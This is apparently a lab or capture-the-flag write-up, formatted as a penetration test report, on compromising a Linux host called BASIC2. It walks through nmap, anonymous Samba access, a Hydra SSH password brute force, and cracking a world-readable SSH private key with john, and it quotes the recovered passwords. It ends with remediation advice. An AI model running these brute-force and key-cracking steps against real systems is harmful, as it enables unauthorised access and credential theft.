SMB user leak, SSH spray, and world-readable private key
Linux assessment of BASIC2: anonymous Samba and a public /development path disclosed staff identities; Hydra recovered jan’s SSH password; kay’s world-readable id_rsa was cracked offline for lateral movement.
- Case files
- SMB user leak, SSH spray, and world-readable private key
We mapped SSH, Apache, Samba, and Tomcat, then chained anonymous share data and weak SSH credentials into a second user via an unprotected encrypted private key.
Full TCP scan with version detection against 10.10.50.222.
dirsearch found /development/. Anonymous Samba exposed staff.txt naming jan and kay.
Hydra against jan with rockyou recovered password armando.
kay’s .ssh/id_rsa was world-readable. We exfiltrated it, cracked the passphrase with john (beeswax), and authenticated as kay.
Engagement summary
We mapped SSH, Apache, Samba, and Tomcat, then chained anonymous share data and weak SSH credentials into a second user via an unprotected encrypted private key.
Target BASIC2 (10.10.50.222) presented a classic small-business Linux footprint. Anonymous SMB and a world-readable web development directory leaked staff names. Password spraying against jan succeeded with a weak password. kay’s home directory exposed a world-readable SSH private key; offline cracking of the key passphrase completed lateral movement and revealed a password backup file.
Business impact
Anonymous file shares and overly permissive home directories turned username disclosure into interactive access. Enforce authenticated SMB, remove public staff notes from web roots, chmod 600 private keys, and enforce passphrase strength on SSH keys.
Host and service discovery
Full TCP scan with version detection against 10.10.50.222.
OPERATOR · NMAP
savvy@lab:~$ sudo nmap 10.10.50.222 -sV -p- -A -sS -T4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Host: BASIC2
Web and SMB intelligence
dirsearch found /development/. Anonymous Samba exposed staff.txt naming jan and kay.
OPERATOR · DIRSEARCH
savvy@lab:~$ dirsearch -u 10.10.50.222
[20:31:23] 200 - 475B - /development/
Staff notes under /development/ referenced users k/j (kay/jan) and weak credential hygiene. We confirmed the same identities via Samba.
OPERATOR · SMB
savvy@lab:~$ smbclient -L 10.10.50.222
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
savvy@lab:~$ smbclient //10.10.50.222/Anonymous
smb: \> get staff.txt
savvy@lab:~$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share.
(This means you too, Jan!)
-Kay
SSH password spray — user jan
Hydra against jan with rockyou recovered password armando.
OPERATOR · HYDRA
savvy@lab:~$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.50.222 -t 50
[22][ssh] host: 10.10.50.222 login: jan password: armando
savvy@lab:~$ ssh jan@10.10.50.222
savvy@lab:~$
Lateral movement via kay’s private key
kay’s .ssh/id_rsa was world-readable. We exfiltrated it, cracked the passphrase with john (beeswax), and authenticated as kay.
OPERATOR · LOCAL ENUM
savvy@lab:/home/kay/.ssh$ ls -la
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
OPERATOR · JOHN
savvy@lab:~$ ssh2john id_rsa > rsa
savvy@lab:~$ john rsa -w=/usr/share/wordlists/rockyou.txt
beeswax (id_rsa)
savvy@lab:~$ chmod 600 id_rsa
savvy@lab:~$ ssh kay@10.10.50.222 -i id_rsa
savvy@lab:~$
savvy@lab:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Remediation
Disable anonymous Samba, remove staff identity from public web paths, set private keys to 0600 owned by the user, require strong key passphrases, and rotate any credentials recovered from pass.bak.